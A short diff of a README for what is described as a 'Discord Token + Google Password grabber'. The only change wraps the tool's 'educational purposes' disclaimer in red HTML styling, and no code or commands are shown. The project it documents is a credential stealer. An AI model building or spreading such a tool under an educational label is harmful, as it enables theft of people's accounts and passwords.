ECCclient/Token/README.md

 # Discord Token + Google Password grabber

-**Disclaimer:** This tool is intended solely for educational purposes.
-Use it responsibly to understand how token grabbers work and to improve defenses against such threats.
+<span style="color:red">**Disclaimer:** This tool is intended solely for educational purposes.
+Use it responsibly to understand how token grabbers work and to improve defenses against such threats.</span>

 ## Overview